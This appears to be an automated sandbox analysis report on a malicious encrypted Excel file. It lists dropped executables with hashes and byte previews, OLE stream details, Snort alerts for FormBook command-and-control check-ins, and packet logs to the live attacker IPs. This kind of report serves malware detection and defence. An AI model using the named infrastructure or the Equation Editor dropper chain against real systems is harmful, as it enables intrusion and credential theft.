                                                                                                                                                                                          SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBDD36B.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):51166
                                                                                                                                                                                          Entropy (8bit):7.767050944061069
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                          MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                          SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                          SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                          SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA391AAF.png
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):84203
                                                                                                                                                                                          Entropy (8bit):7.979766688932294
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                                                                                                                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                                                                                                                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                                                                                                                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                                                                                                                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll
                                                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):11776
                                                                                                                                                                                          Entropy (8bit):5.855045165595541
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                          MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                          SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                          SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                          SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsw45F7.tmp
                                                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):261012
                                                                                                                                                                                          Entropy (8bit):7.3456635705707685
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:9ob3S8T7kC7sf3eG3Jw24DKBGNLtqEZpG+x6t:iz7kC7sf3t3EFtpDGma
                                                                                                                                                                                          MD5:AF69C1313ADD571627D87D2453F87D28
                                                                                                                                                                                          SHA1:97818C9D2B9E8794F97D27CF0EBC2A763639F5E0
                                                                                                                                                                                          SHA-256:6AFC732265B4C7257FF86EEE7AA8AD9E25DA0E0BA996CE425BDFF07EBF2B4349
                                                                                                                                                                                          SHA-512:8C9E2FC2BADD92D495FAB633AC537842665F59B90D04CF2AAA8BDDBD06D25CEA631153C842F08C29AFE83129583D82CD48EFCD7DAA4CCAE3662A02563ED3ABC0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: .m......,.......................LP......-l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\x8abgzdx2taarfhvmdw
                                                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):164352
                                                                                                                                                                                          Entropy (8bit):7.998740117796754
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:3072:WI3SWiaT7vg17lM7sf37lghuFa47Zrw24HAsFUyzyBGNmqDv:93S8T7kC7sf3eG3Jw24DKBGNLz
                                                                                                                                                                                          MD5:D6A1573FFB40613104C0755D78241AB4
                                                                                                                                                                                          SHA1:8567FBE29F2DE39618F8FC5EEAFB18F5C6B9D4AD
                                                                                                                                                                                          SHA-256:B3132DA42852DD7F3C7BD9044AF9FB0916F9B8C6C6854B572F2CA6424CF2FECD
                                                                                                                                                                                          SHA-512:6042A74B4572B2D04182EE3B8E6BF0D5518B4C752C887FB8AB770A5B8D385B5E58500EA4DE980227E577DABE9DD01B457F700ECECDA107180646DB8ADCE80981
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: ....^..#.5...AW|.r.."*..n.............h.o....I....=.+.O5.uK...;...@.A..=-%-6\..u$.e.AL...2L.JY..F@p...O..a..F....F.\.......,.d8..G.H...A.V..Pz..K.w.2.p7.b`..?.....84..[.)'..`g0..r......_cC..A.c.....9.A..v.5.TJ.~.+.EB.&..?..4.......p..#&.Z.d<p.SQl.gA.(..J.0....`=m.p`..,..:U[wd...b.....].K^....z..3Ekx..d.x.|i...E.0.......f=*.k... jG..5D...l...p^ x..7.c..$....!...h....i.......L*...a..P....}6t.{.(xq.~N|}......%G...,SGlG..{_..o.9...'.?....ap!.F....[.].9s..Y...Y8.3%o.:n.Wp..MN....'.b...d...</.w.*T6)...g.0B}G.B.w%.g....H.F...L....L..ks.q7r..i..Us9..g..G5.v..Y....8r.I.j2.......~uPw....2....N..w..$5.......^....p....V.amT.t....RT..hf.t.....,...H.8...Q#..Fd..._...g...Kz..T.Z..\w .A......{..G..........c....1.X6.R1`.E.U..l..H.?)K...{....'@...PR(......?%2#....j...A.?.M...f.2..v..t=.+..q..fzF..C...C....KR......'.....".cr"..7p96....J|q...x..T.....nc...^..k.fP......... .0g.H.w.y..Lt"n.D..]&?I..iu..~..e.._p.......8R......9sv=K.M..%...Q.4.=q.4...aH@.q^.+..g..;
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\yerrxvolv
                                                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):56945
                                                                                                                                                                                          Entropy (8bit):4.916897762190798
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:5HwlaCciRuhiRUidh5HAYBe16mKqrk5US/zf6Up:NacPUXHl06pG+US/OO
                                                                                                                                                                                          MD5:83D3E22048178472A2287533D5C2FE99
                                                                                                                                                                                          SHA1:CA6E1F360EF458E914968D27963E2E821B281080
                                                                                                                                                                                          SHA-256:98B4220FF7F5974B33154C161C82A814078FE0D670726F0C62CBCB17F9A0A8FE
                                                                                                                                                                                          SHA-512:7151EEF108AFDCB5B7794718128973A4941197ED572AF9F20E68CB5637CC8DF2A17555765E45C101787EE7EB2D662C54E74EA5229890C90DB2C11CC24D1198F2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview: U.......3.... .....!.....".....#.....$.....%...o.&.....'.....(.....).....*...8.+.....,...o.-.........../.....0.....1.....2.....3.....4.....5.....6.....7... .8.....9...1.:.....;.....<.....=.....>.....?.....@.....A.....B...0.C...k.D.....E.....F.....G...g.H.....I.....J...H.K.....L.....M.....N.....O...r.P.....Q.....R.....S.....T.....U.....V...k.W.....X.....Y.....Z.....[.....\.....]...k.^....._.....`...].a...X.b...1.c.....d.....e.....f.....g.....h.....i.....j.....k...<.l...y.m...y.n...y.o...k.p.....q...x.r.....s...g.t.....u.....v...H.w.....x.....y.....z...x.{...r.|.....}.....~...............x...........k...........x.............................k.................].....X.....1...........................................................y.....y.....y.....k.......................g.................H.............................r..............................
                                                                                                                                                                                          C:\Users\user\Desktop\~$L2.xlsx
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):224710
                                                                                                                                                                                          Entropy (8bit):7.912728398567341
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
                                                                                                                                                                                          MD5:8C35AC8D43F7E59105902FA16114144E
                                                                                                                                                                                          SHA1:C1A0E5DE1121E55C22649182C923B41EFD4E2848
                                                                                                                                                                                          SHA-256:1A08FC838C4EBAB6B986B6010E2074A05C29916CD38096E7F7D26A6455917508
                                                                                                                                                                                          SHA-512:F89DA0804389F71E3627B9BCC5299D6EAAB0649197D1084FB3B6F63E4BD126BAF333C9781AA02C3666AC59E79CB645487CFDBE19061B1C5119098529BFBD7F18
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: Metadefender, Detection: 23%, Browse
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                                                          Entropy (8bit):7.995578935184159
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                          File name:L2.xlsx
                                                                                                                                                                                          File size:1308600
                                                                                                                                                                                          MD5:e5aaa3f2879244a0b44b27ce151e0c29
                                                                                                                                                                                          SHA1:eb0608507f6aa9432f276ab6fcaeddc7439bf169
                                                                                                                                                                                          SHA256:d9aa9baf5698eebd324bf2d501d72a62ce6973eeb42a7dce961d0e65baaad67f
                                                                                                                                                                                          SHA512:378f161ed695cc96c7b1bc11d2e4745090beee7b65802e848890d82e097d046bf59bfec99c3483aeae9d75e75716fa3f4649cc80e2872952e8d58daa2061f329
                                                                                                                                                                                          SSDEEP:24576:8aqT3NL8qo597tcvl4LXOETHVhwfhV2PpqTOwyc/cxzHbk/u:Y2z97t/THVO/2huyfx38u
                                                                                                                                                                                          File Content Preview:........................>...............................................................................................................z.......z.......~......................................................................................................

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Document Type:OLE
                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                          OLE File "L2.xlsx"

                                                                                                                                                                                          Indicators

                                                                                                                                                                                          Has Summary Info:False
                                                                                                                                                                                          Application Name:unknown
                                                                                                                                                                                          Encrypted Document:True
                                                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                                                          Streams

                                                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:64
                                                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:112
                                                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:208
                                                                                                                                                                                          Entropy:3.35153409046
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:76
                                                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 1294776
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:1294776
                                                                                                                                                                                          Entropy:7.99983620552
                                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                                          Data ASCII:. . . . . . . . ! . . . . . m . . < . . . . ' . . . ~ 2 > > . { . . . l . > . . . . . . . 6 . . [ n . . . . . . . ] . . . . . } Q . . . j . . . o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 . i x % . . + d ? o . ` * Z / 1 .
                                                                                                                                                                                          Data Raw:ac c1 13 00 00 00 00 00 21 9c 18 96 98 ba 6d 87 c0 3c cb ea 07 9d 27 e9 82 bd 7e 32 3e 3e 14 7b f1 b3 f4 6c 09 3e 1a bb a7 ae 1f e0 19 36 aa a2 5b 6e 17 bf 81 99 96 ad 91 5d d7 f4 f1 9f a9 7d 51 de f9 a8 6a ce 80 96 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a 69 78 25 b6 94 2b 64 3f 6f 85 60 2a 5a 2f 31 0a
                                                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:224
                                                                                                                                                                                          Entropy:4.61330272016
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . e . Q . . . m 8 . Q o . . . N . . . . . . N ; . . . k i . . . . . . . . . L . . d . . 2 . . . . . . , . p E . I . . . . 9 . . m .
                                                                                                                                                                                          Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 e0 a3 0f 03 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                          06/11/21-08:06:48.269107TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22192.210.173.40
                                                                                                                                                                                          06/11/21-08:08:17.470238TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2245.195.169.197
                                                                                                                                                                                          06/11/21-08:08:17.470238TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2245.195.169.197
                                                                                                                                                                                          06/11/21-08:08:17.470238TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2245.195.169.197

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Jun 11, 2021 08:06:48.070724964 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.268426895 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.268569946 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.269107103 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467674017 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467708111 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467727900 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467746973 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467828035 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467958927 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665436029 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665472984 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665488958 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665503025 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665518045 CEST8049165192.210.173.40192.168.2.22
